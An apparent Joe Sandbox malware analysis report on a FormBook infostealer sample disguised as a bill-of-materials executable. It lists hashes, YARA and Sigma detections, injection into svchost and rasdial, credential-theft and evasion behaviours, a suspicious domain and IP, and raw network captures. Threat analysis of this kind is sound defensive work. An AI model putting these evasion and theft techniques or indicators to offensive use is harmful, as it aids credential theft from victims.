Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
Copy of 01. Bill of Material - 705.exe

Overview

General Information

Sample name:Copy of 01. Bill of Material - 705.exe
Analysis ID:1497886
MD5:806f72c900778deccf64f8a4ec8cdbc9
SHA1:d2bcb914eae4d432183d980ea19bee69f4b2d4fe
SHA256:642475685812ab7bbc355bb0012722266572aeadc8af18e4a4b0498229deb385
Tags:exe
Infos:

Detection

FormBook
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Yara detected FormBook
AI detected suspicious sample
Binary is likely a compiled AutoIt script file
Found API chain indicative of sandbox detection
Found direct / indirect Syscall (likely to bypass EDR)
Initial sample is a PE file and has a suspicious name
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Performs DNS queries to domains with low reputation
Queues an APC in another process (thread injection)
Switches to a custom stack to bypass stack traces
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Writes to foreign memory regions
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to block mouse and keyboard input (often used to hinder debugging)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to execute programs as a different user
Contains functionality to launch a process as a different user
Contains functionality to launch a program with higher privileges
Contains functionality to modify clipboard data
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate keystroke presses
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Creates processes with suspicious names
Detected potential crypto function
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
OS version to string mapping found (often used in BOTs)
Potential key logger detected (key state polling based)
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Suspicious RASdial Activity
Sigma detected: Uncommon Svchost Parent Process
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Process Tree

  • System is w10x64
  • Copy of 01. Bill of Material - 705.exe (PID: 1096 cmdline: "C:\Users\user\Desktop\Copy of 01. Bill of Material - 705.exe" MD5: 806F72C900778DECCF64F8A4EC8CDBC9)
    • svchost.exe (PID: 6492 cmdline: "C:\Users\user\Desktop\Copy of 01. Bill of Material - 705.exe" MD5: 1ED18311E3DA35942DB37D15FA40CC5B)
      • GQXHQykfhUHHi.exe (PID: 6520 cmdline: "C:\Program Files (x86)\ILWkaPetWEWvsHqQeuqLuqkjcoNemjdtBIFUkxHiurSHEgoGdFKHKZmSllAsOClRyqQWoEsJmKE\GQXHQykfhUHHi.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
        • rasdial.exe (PID: 3136 cmdline: "C:\Windows\SysWOW64\rasdial.exe" MD5: A280B0F42A83064C41CFFDC1CD35136E)
          • GQXHQykfhUHHi.exe (PID: 6008 cmdline: "C:\Program Files (x86)\ILWkaPetWEWvsHqQeuqLuqkjcoNemjdtBIFUkxHiurSHEgoGdFKHKZmSllAsOClRyqQWoEsJmKE\GQXHQykfhUHHi.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
          • firefox.exe (PID: 5952 cmdline: "C:\Program Files\Mozilla Firefox\Firefox.exe" MD5: C86B1BE9ED6496FE0E0CBE73F81D8045)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
Formbook, FormboFormBook contains a unique crypter RunPE that has unique behavioral patterns subject to detection. It was initially called "Babushka Crypter" by Insidemalware.
  • SWEED
  • Cobalt
https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook

Malware Configuration

No configs have been found

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000006.00000002.4642142846.0000000000800000.00000040.80000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
    00000006.00000002.4642142846.0000000000800000.00000040.80000000.00040000.00000000.sdmpWindows_Trojan_Formbook_1112e116unknownunknown
    • 0x2bd40:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
    • 0x140bf:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
    00000006.00000002.4651757327.00000000044D0000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
      00000006.00000002.4651757327.00000000044D0000.00000004.00000800.00020000.00000000.sdmpWindows_Trojan_Formbook_1112e116unknownunknown
      • 0x2bd40:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
      • 0x140bf:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
      00000002.00000002.2525577951.0000000000400000.00000040.80000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
        Click to see the 11 entries

        Unpacked PEs

        SourceRuleDescriptionAuthorStrings
        2.2.svchost.exe.400000.0.unpackJoeSecurity_FormBook_1Yara detected FormBookJoe Security
          2.2.svchost.exe.400000.0.unpackWindows_Trojan_Formbook_1112e116unknownunknown
          • 0x2e053:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
          • 0x163d2:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
          2.2.svchost.exe.400000.0.raw.unpackJoeSecurity_FormBook_1Yara detected FormBookJoe Security
            2.2.svchost.exe.400000.0.raw.unpackWindows_Trojan_Formbook_1112e116unknownunknown
            • 0x2ee53:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
            • 0x171d2:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01

            Sigma Signatures

            System Summary

            barindex
            Sigma detected: Suspicious RASdial Activity
            Source: Process startedAuthor: juju4: Data: Command: "C:\Windows\SysWOW64\rasdial.exe", CommandLine: "C:\Windows\SysWOW64\rasdial.exe", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\rasdial.exe, NewProcessName: C:\Windows\SysWOW64\rasdial.exe, OriginalFileName: C:\Windows\SysWOW64\rasdial.exe, ParentCommandLine: "C:\Program Files (x86)\ILWkaPetWEWvsHqQeuqLuqkjcoNemjdtBIFUkxHiurSHEgoGdFKHKZmSllAsOClRyqQWoEsJmKE\GQXHQykfhUHHi.exe" , ParentImage: C:\Program Files (x86)\ILWkaPetWEWvsHqQeuqLuqkjcoNemjdtBIFUkxHiurSHEgoGdFKHKZmSllAsOClRyqQWoEsJmKE\GQXHQykfhUHHi.exe, ParentProcessId: 6520, ParentProcessName: GQXHQykfhUHHi.exe, ProcessCommandLine: "C:\Windows\SysWOW64\rasdial.exe", ProcessId: 3136, ProcessName: rasdial.exe
            Sigma detected: Uncommon Svchost Parent Process
            Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Users\user\Desktop\Copy of 01. Bill of Material - 705.exe", CommandLine: "C:\Users\user\Desktop\Copy of 01. Bill of Material - 705.exe", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\Copy of 01. Bill of Material - 705.exe", ParentImage: C:\Users\user\Desktop\Copy of 01. Bill of Material - 705.exe, ParentProcessId: 1096, ParentProcessName: Copy of 01. Bill of Material - 705.exe, ProcessCommandLine: "C:\Users\user\Desktop\Copy of 01. Bill of Material - 705.exe", ProcessId: 6492, ProcessName: svchost.exe
            Sigma detected: Windows Processes Suspicious Parent Directory
            Source: Process startedAuthor: vburov: Data: Command: "C:\Users\user\Desktop\Copy of 01. Bill of Material - 705.exe", CommandLine: "C:\Users\user\Desktop\Copy of 01. Bill of Material - 705.exe", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\Copy of 01. Bill of Material - 705.exe", ParentImage: C:\Users\user\Desktop\Copy of 01. Bill of Material - 705.exe, ParentProcessId: 1096, ParentProcessName: Copy of 01. Bill of Material - 705.exe, ProcessCommandLine: "C:\Users\user\Desktop\Copy of 01. Bill of Material - 705.exe", ProcessId: 6492, ProcessName: svchost.exe

            Suricata Signatures

            No Suricata rule has matched

            Joe Sandbox Signatures

            Click to jump to signature section

            Show All Signature Results

            AV Detection

            barindex
            Multi AV Scanner detection for submitted file
            Source: Copy of 01. Bill of Material - 705.exeReversingLabs: Detection: 39%
            Source: Copy of 01. Bill of Material - 705.exeVirustotal: Detection: 29%Perma Link
            Yara detected FormBook
            Source: Yara matchFile source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000006.00000002.4642142846.0000000000800000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000006.00000002.4651757327.00000000044D0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000002.2525577951.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000002.2527501783.0000000006980000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000007.00000002.4654251110.00000000056E0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000006.00000002.4651596001.0000000002BA0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000002.4651797494.0000000002EF0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000002.2526291195.0000000003C90000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            AI detected suspicious sample
            Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
            Machine Learning detection for sample
            Source: Copy of 01. Bill of Material - 705.exeJoe Sandbox ML: detected
            Source: Copy of 01. Bill of Material - 705.exeStatic PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
            Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: GQXHQykfhUHHi.exe, 00000004.00000002.4644705252.0000000000DAE000.00000002.00000001.01000000.00000005.sdmp, GQXHQykfhUHHi.exe, 00000007.00000002.4642079066.0000000000DAE000.00000002.00000001.01000000.00000005.sdmp
            Source: Binary string: wntdll.pdbUGP source: Copy of 01. Bill of Material - 705.exe, 00000000.00000003.2177667047.0000000003D50000.00000004.00001000.00020000.00000000.sdmp, Copy of 01. Bill of Material - 705.exe, 00000000.00000003.2176659408.0000000003EA0000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2430910122.0000000003400000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2525920699.000000000399E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2525920699.0000000003800000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2433064338.0000000003600000.00000004.00000020.00020000.00000000.sdmp, rasdial.exe, 00000006.00000002.4652162130.00000000048CE000.00000040.00001000.00020000.00000000.sdmp, rasdial.exe, 00000006.00000003.2525931476.00000000043D1000.00000004.00000020.00020000.00000000.sdmp, rasdial.exe, 00000006.00000003.2528100736.0000000004583000.00000004.00000020.00020000.00000000.sdmp, rasdial.exe, 00000006.00000002.4652162130.0000000004730000.00000040.00001000.00020000.00000000.sdmp
            Source: Binary string: rasdial.pdb source: svchost.exe, 00000002.00000003.2494792485.000000000321A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2525760101.0000000003200000.00000004.00000020.00020000.00000000.sdmp, GQXHQykfhUHHi.exe, 00000004.00000002.4647734921.00000000011A8000.00000004.00000020.00020000.00000000.sdmp, GQXHQykfhUHHi.exe, 00000004.00000003.2469658209.00000000011BB000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: wntdll.pdb source: Copy of 01. Bill of Material - 705.exe, 00000000.00000003.2177667047.0000000003D50000.00000004.00001000.00020000.00000000.sdmp, Copy of 01. Bill of Material - 705.exe, 00000000.00000003.2176659408.0000000003EA0000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, svchost.exe, 00000002.00000003.2430910122.0000000003400000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2525920699.000000000399E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2525920699.0000000003800000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2433064338.0000000003600000.00000004.00000020.00020000.00000000.sdmp, rasdial.exe, rasdial.exe, 00000006.00000002.4652162130.00000000048CE000.00000040.00001000.00020000.00000000.sdmp, rasdial.exe, 00000006.00000003.2525931476.00000000043D1000.00000004.00000020.00020000.00000000.sdmp, rasdial.exe, 00000006.00000003.2528100736.0000000004583000.00000004.00000020.00020000.00000000.sdmp, rasdial.exe, 00000006.00000002.4652162130.0000000004730000.00000040.00001000.00020000.00000000.sdmp
            Source: Binary string: rasdial.pdbGCTL source: svchost.exe, 00000002.00000003.2494792485.000000000321A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2525760101.0000000003200000.00000004.00000020.00020000.00000000.sdmp, GQXHQykfhUHHi.exe, 00000004.00000002.4647734921.00000000011A8000.00000004.00000020.00020000.00000000.sdmp, GQXHQykfhUHHi.exe, 00000004.00000003.2469658209.00000000011BB000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: svchost.pdb source: rasdial.exe, 00000006.00000002.4642916283.0000000002A59000.00000004.00000020.00020000.00000000.sdmp, rasdial.exe, 00000006.00000002.4653099996.0000000004D5C000.00000004.10000000.00040000.00000000.sdmp, GQXHQykfhUHHi.exe, 00000007.00000000.2593226561.00000000032AC000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000009.00000002.2819411569.0000000023A9C000.00000004.80000000.00040000.00000000.sdmp
            Source: Binary string: svchost.pdbUGP source: rasdial.exe, 00000006.00000002.4642916283.0000000002A59000.00000004.00000020.00020000.00000000.sdmp, rasdial.exe, 00000006.00000002.4653099996.0000000004D5C000.00000004.10000000.00040000.00000000.sdmp, GQXHQykfhUHHi.exe, 00000007.00000000.2593226561.00000000032AC000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000009.00000002.2819411569.0000000023A9C000.00000004.80000000.00040000.00000000.sdmp
            Source: C:\Users\user\Desktop\Copy of 01. Bill of Material - 705.exeCode function: 0_2_0039DBBE lstrlenW,GetFileAttributesW,FindFirstFileW,FindClose,0_2_0039DBBE
            Source: C:\Users\user\Desktop\Copy of 01. Bill of Material - 705.exeCode function: 0_2_0036C2A2 FindFirstFileExW,0_2_0036C2A2
            Source: C:\Users\user\Desktop\Copy of 01. Bill of Material - 705.exeCode function: 0_2_003A68EE FindFirstFileW,FindClose,0_2_003A68EE
            Source: C:\Users\user\Desktop\Copy of 01. Bill of Material - 705.exeCode function: 0_2_003A698F FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToSystemTime,FileTimeToSystemTime,0_2_003A698F
            Source: C:\Users\user\Desktop\Copy of 01. Bill of Material - 705.exeCode function: 0_2_0039D076 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,0_2_0039D076
            Source: C:\Users\user\Desktop\Copy of 01. Bill of Material - 705.exeCode function: 0_2_0039D3A9 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,0_2_0039D3A9
            Source: C:\Users\user\Desktop\Copy of 01. Bill of Material - 705.exeCode function: 0_2_003A9642 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_003A9642
            Source: C:\Users\user\Desktop\Copy of 01. Bill of Material - 705.exeCode function: 0_2_003A979D SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_003A979D
            Source: C:\Users\user\Desktop\Copy of 01. Bill of Material - 705.exeCode function: 0_2_003A9B2B FindFirstFileW,Sleep,FindNextFileW,FindClose,0_2_003A9B2B
            Source: C:\Users\user\Desktop\Copy of 01. Bill of Material - 705.exeCode function: 0_2_003A5C97 FindFirstFileW,FindNextFileW,FindClose,0_2_003A5C97
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_0081C420 FindFirstFileW,FindNextFileW,FindClose,6_2_0081C420
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 4x nop then xor eax, eax6_2_00809B60
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 4x nop then pop edi6_2_0080E109
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 4x nop then mov ebx, 00000004h6_2_045C04DF

            Networking

            barindex
            Performs DNS queries to domains with low reputation
            Source: DNS query: www.jaxo.xyz
            Source: Joe Sandbox ViewIP Address: 103.224.182.242 103.224.182.242
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: C:\Users\user\Desktop\Copy of 01. Bill of Material - 705.exeCode function: 0_2_003ACE44 InternetReadFile,SetEvent,GetLastError,SetEvent,0_2_003ACE44
            Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKdate: Fri, 23 Aug 2024 06:27:18 GMTserver: Apacheset-cookie: __tad=1724394438.1131553; expires=Mon, 21-Aug-2034 06:27:18 GMT; Max-Age=315360000vary: Accept-Encodingcontent-encoding: gzipcontent-length: 577content-type: text/html; charset=UTF-8connection: closeData Raw: 1f 8b 08 00 00 00 00 00 00 03 8d 54 4d 6f 9c 30 10 3d 2f bf 62 44 0e b0 4a 83 37 4a 9b 48 bb 40 0f 95 2a b5 ea a1 4a da 73 e5 98 61 71 02 36 b5 87 fd 50 b4 ff bd 63 96 7c b4 95 9a fa 02 1e bf 37 6f de 30 26 6f a8 6b cb 28 6f 50 56 fc 20 4d 2d 96 bb da ba a1 cb 08 55 93 8b 63 28 ca bd 72 ba 27 a0 7d 8f 45 4c b8 23 71 27 37 f2 18 8d c1 3b 55 c4 e2 ce 8b 5a 9b 35 ba de 69 43 42 eb 1a b3 4e 9b ec ce c7 65 2e 8e d8 d7 52 95 d1 46 3a 70 58 69 87 8a 7e b4 da dc 43 01 49 43 d4 2f 85 d8 6e b7 d9 8b f2 c4 e5 db ab 9d 78 9f ac a2 48 08 b8 41 02 09 a4 3b b4 03 81 ad e1 62 b1 80 4e 2b 67 3d 2a 6b 2a 0f 64 01 77 a8 06 42 06 3e 6a 80 ae 81 1a 84 17 a5 43 ef 6c a7 3d c7 a4 6e 3d b0 20 78 db 21 53 a4 b7 26 aa 07 a3 48 5b c3 c7 6d 7b 2b d5 fd f5 94 2a 9d c3 43 34 db 6a 53 d9 6d d6 5a 25 03 2a 73 d8 b7 52 61 fa 9b a9 d3 a4 ee 8b b3 ab 64 be 8a 0e 51 44 6e 1f 98 5c a5 27 70 95 fb 36 99 28 c0 23 4d 9b f4 4f b5 37 c1 20 f3 67 a1 63 75 ff 75 aa b9 80 8f cf 4e 3e df 70 1d b2 4a 1f 3a 6b 34 59 0e ad 97 a1 6c 8f 87 c0 7c 62 45 b3 59 c6 4d 30 69 dd 43 51 72 b6 6c 8d 6c 67 fe 14 e7 97 99 43 3f b4 14 ce 1f 20 ec 27 61 17 ea 0c 76 92 d3 23 22 db 68 1f c4 3e 55 ab 11 a6 5a 94 8f 96 d2 67 77 f3 e3 e9 ff b5 2b c8 8c 84 50 f7 01 18 ab 9a 14 9d 1b 3b fe f7 77 18 bb fa 72 e6 68 cf 63 0c b7 b6 e2 46 43 c0 ae 9d 1d 4c b5 3c 39 5f 9c ab 8b 4b 38 00 a3 47 10 d3 a6 eb 30 a2 6f d7 ca b6 d6 15 f1 49 3d ae 18 c2 c8 f2 76 31 2e 1e d8 bc d2 1b 18 b9 45 52 69 cf d5 ef 97 60 ac c1 55 52 e6 12 1a 87 75 f1 ef 01 0e a3 70 91 94 1f 5a ad ee a1 41 87 e3 a4 1a 42 97 0b c9 57 87 05 58 c6 d8 c9 4e de 21 71 5e ce 78 86 3f 07 bd 29 62 96 e0 d6 37 31 f0 04 11 13 8b 78 b1 82 ef d7 5f 8a 57 65 df 85 ab f9 94 99 bd 07 d3 63 0f c2 9f e1 17 f0 d7 93 65 20 04 00 00 Data Ascii: TMo0=/bDJ7JH@*Jsaq6Pc|7o0&ok(oPV M-Uc(r'}EL#q'7;UZ5iCBNe.RF:pXi~CIC/nxHA;bN+g=*k*dwB>jCl=n= x!S&H[m{+*C4jSmZ%*sRadQDn\'p6(#MO7 gcuuN>pJ:k4Yl|bEYM0iCQrllgC? 'av#"h>UZgw+P;wrhcFCL<9_K8G0oI=v1.ERi`URupZABWXN!q^x?)b71x_Wece
            Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKdate: Fri, 23 Aug 2024 06:27:20 GMTserver: Apacheset-cookie: __tad=1724394440.4608183; expires=Mon, 21-Aug-2034 06:27:20 GMT; Max-Age=315360000vary: Accept-Encodingcontent-encoding: gzipcontent-length: 577content-type: text/html; charset=UTF-8connection: closeData Raw: 1f 8b 08 00 00 00 00 00 00 03 8d 54 4d 6f 9c 30 10 3d 2f bf 62 44 0e b0 4a 83 37 4a 9b 48 bb 40 0f 95 2a b5 ea a1 4a da 73 e5 98 61 71 02 36 b5 87 fd 50 b4 ff bd 63 96 7c b4 95 9a fa 02 1e bf 37 6f de 30 26 6f a8 6b cb 28 6f 50 56 fc 20 4d 2d 96 bb da ba a1 cb 08 55 93 8b 63 28 ca bd 72 ba 27 a0 7d 8f 45 4c b8 23 71 27 37 f2 18 8d c1 3b 55 c4 e2 ce 8b 5a 9b 35 ba de 69 43 42 eb 1a b3 4e 9b ec ce c7 65 2e 8e d8 d7 52 95 d1 46 3a 70 58 69 87 8a 7e b4 da dc 43 01 49 43 d4 2f 85 d8 6e b7 d9 8b f2 c4 e5 db ab 9d 78 9f ac a2 48 08 b8 41 02 09 a4 3b b4 03 81 ad e1 62 b1 80 4e 2b 67 3d 2a 6b 2a 0f 64 01 77 a8 06 42 06 3e 6a 80 ae 81 1a 84 17 a5 43 ef 6c a7 3d c7 a4 6e 3d b0 20 78 db 21 53 a4 b7 26 aa 07 a3 48 5b c3 c7 6d 7b 2b d5 fd f5 94 2a 9d c3 43 34 db 6a 53 d9 6d d6 5a 25 03 2a 73 d8 b7 52 61 fa 9b a9 d3 a4 ee 8b b3 ab 64 be 8a 0e 51 44 6e 1f 98 5c a5 27 70 95 fb 36 99 28 c0 23 4d 9b f4 4f b5 37 c1 20 f3 67 a1 63 75 ff 75 aa b9 80 8f cf 4e 3e df 70 1d b2 4a 1f 3a 6b 34 59 0e ad 97 a1 6c 8f 87 c0 7c 62 45 b3 59 c6 4d 30 69 dd 43 51 72 b6 6c 8d 6c 67 fe 14 e7 97 99 43 3f b4 14 ce 1f 20 ec 27 61 17 ea 0c 76 92 d3 23 22 db 68 1f c4 3e 55 ab 11 a6 5a 94 8f 96 d2 67 77 f3 e3 e9 ff b5 2b c8 8c 84 50 f7 01 18 ab 9a 14 9d 1b 3b fe f7 77 18 bb fa 72 e6 68 cf 63 0c b7 b6 e2 46 43 c0 ae 9d 1d 4c b5 3c 39 5f 9c ab 8b 4b 38 00 a3 47 10 d3 a6 eb 30 a2 6f d7 ca b6 d6 15 f1 49 3d ae 18 c2 c8 f2 76 31 2e 1e d8 bc d2 1b 18 b9 45 52 69 cf d5 ef 97 60 ac c1 55 52 e6 12 1a 87 75 f1 ef 01 0e a3 70 91 94 1f 5a ad ee a1 41 87 e3 a4 1a 42 97 0b c9 57 87 05 58 c6 d8 c9 4e de 21 71 5e ce 78 86 3f 07 bd 29 62 96 e0 d6 37 31 f0 04 11 13 8b 78 b1 82 ef d7 5f 8a 57 65 df 85 ab f9 94 99 bd 07 d3 63 0f c2 9f e1 17 f0 d7 93 65 20 04 00 00 Data Ascii: TMo0=/bDJ7JH@*Jsaq6Pc|7o0&ok(oPV M-Uc(r'}EL#q'7;UZ5iCBNe.RF:pXi~CIC/nxHA;bN+g=*k*dwB>jCl=n= x!S&H[m{+*C4jSmZ%*sRadQDn\'p6(#MO7 gcuuN>pJ:k4Yl|bEYM0iCQrllgC? 'av#"h>UZgw+P;wrhcFCL<9_K8G0oI=v1.ERi`URupZABWXN!q^x?)b71x_Wece
            Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKdate: Fri, 23 Aug 2024 06:27:23 GMTserver: Apacheset-cookie: __tad=1724394443.6196117; expires=Mon, 21-Aug-2034 06:27:23 GMT; Max-Age=315360000vary: Accept-Encodingcontent-encoding: gzipcontent-length: 577content-type: text/html; charset=UTF-8connection: closeData Raw: 1f 8b 08 00 00 00 00 00 00 03 8d 54 4d 6f 9c 30 10 3d 2f bf 62 44 0e b0 4a 83 37 4a 9b 48 bb 40 0f 95 2a b5 ea a1 4a da 73 e5 98 61 71 02 36 b5 87 fd 50 b4 ff bd 63 96 7c b4 95 9a fa 02 1e bf 37 6f de 30 26 6f a8 6b cb 28 6f 50 56 fc 20 4d 2d 96 bb da ba a1 cb 08 55 93 8b 63 28 ca bd 72 ba 27 a0 7d 8f 45 4c b8 23 71 27 37 f2 18 8d c1 3b 55 c4 e2 ce 8b 5a 9b 35 ba de 69 43 42 eb 1a b3 4e 9b ec ce c7 65 2e 8e d8 d7 52 95 d1 46 3a 70 58 69 87 8a 7e b4 da dc 43 01 49 43 d4 2f 85 d8 6e b7 d9 8b f2 c4 e5 db ab 9d 78 9f ac a2 48 08 b8 41 02 09 a4 3b b4 03 81 ad e1 62 b1 80 4e 2b 67 3d 2a 6b 2a 0f 64 01 77 a8 06 42 06 3e 6a 80 ae 81 1a 84 17 a5 43 ef 6c a7 3d c7 a4 6e 3d b0 20 78 db 21 53 a4 b7 26 aa 07 a3 48 5b c3 c7 6d 7b 2b d5 fd f5 94 2a 9d c3 43 34 db 6a 53 d9 6d d6 5a 25 03 2a 73 d8 b7 52 61 fa 9b a9 d3 a4 ee 8b b3 ab 64 be 8a 0e 51 44 6e 1f 98 5c a5 27 70 95 fb 36 99 28 c0 23 4d 9b f4 4f b5 37 c1 20 f3 67 a1 63 75 ff 75 aa b9 80 8f cf 4e 3e df 70 1d b2 4a 1f 3a 6b 34 59 0e ad 97 a1 6c 8f 87 c0 7c 62 45 b3 59 c6 4d 30 69 dd 43 51 72 b6 6c 8d 6c 67 fe 14 e7 97 99 43 3f b4 14 ce 1f 20 ec 27 61 17 ea 0c 76 92 d3 23 22 db 68 1f c4 3e 55 ab 11 a6 5a 94 8f 96 d2 67 77 f3 e3 e9 ff b5 2b c8 8c 84 50 f7 01 18 ab 9a 14 9d 1b 3b fe f7 77 18 bb fa 72 e6 68 cf 63 0c b7 b6 e2 46 43 c0 ae 9d 1d 4c b5 3c 39 5f 9c ab 8b 4b 38 00 a3 47 10 d3 a6 eb 30 a2 6f d7 ca b6 d6 15 f1 49 3d ae 18 c2 c8 f2 76 31 2e 1e d8 bc d2 1b 18 b9 45 52 69 cf d5 ef 97 60 ac c1 55 52 e6 12 1a 87 75 f1 ef 01 0e a3 70 91 94 1f 5a ad ee a1 41 87 e3 a4 1a 42 97 0b c9 57 87 05 58 c6 d8 c9 4e de 21 71 5e ce 78 86 3f 07 bd 29 62 96 e0 d6 37 31 f0 04 11 13 8b 78 b1 82 ef d7 5f 